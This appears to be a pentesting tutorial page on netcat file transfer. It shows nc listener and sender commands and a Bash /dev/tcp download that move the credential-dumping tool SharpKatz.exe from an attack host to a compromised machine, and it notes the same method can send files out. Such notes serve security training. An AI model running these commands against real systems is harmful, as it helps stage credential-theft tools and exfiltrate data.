Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Netcat File Transfer

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP, which means that we can use it for file transfer operations.

The original Netcat was released by Hobbit in 1995, but it hasn’t been maintained despite its popularity.

File Transfer Methods

The target or attacking machine can be used to initiate the connection, which is helpful if a firewall prevents access to the target.

Method 1: Compromised Machine Listening

Compromised machine (listening):

nc -l -p 8000 > SharpKatz.exe

Attack host (sending):

nc -q 0 192.168.49.128 8000 < SharpKatz.exe

The -q 0 option tells Netcat to close the connection once it finishes, so you’ll know when the file transfer was completed.

Method 2: Attack Host Listening

Attack host (listening):

sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised machine (receiving):

nc 192.168.49.128 443 > SharpKatz.exe

This method is useful in scenarios where there’s a firewall blocking inbound connections.

Method 3: Using Bash /dev/tcp (No Netcat Required)

If Netcat is not available on the compromised machine, Bash supports read/write operations on a pseudo-device file /dev/TCP/.

Attack host (listening):

sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised machine (receiving via /dev/tcp):

cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

Writing to this particular file makes Bash open a TCP connection to host:port, and this feature may be used for file transfers.

Note: The same operation can be used to transfer files from the compromised host to the attack host.

Common Options

  • -l: Listen mode
  • -p <port>: Specify port number
  • -q <seconds>: Wait specified seconds after EOF on stdin, then quit (0 = quit immediately)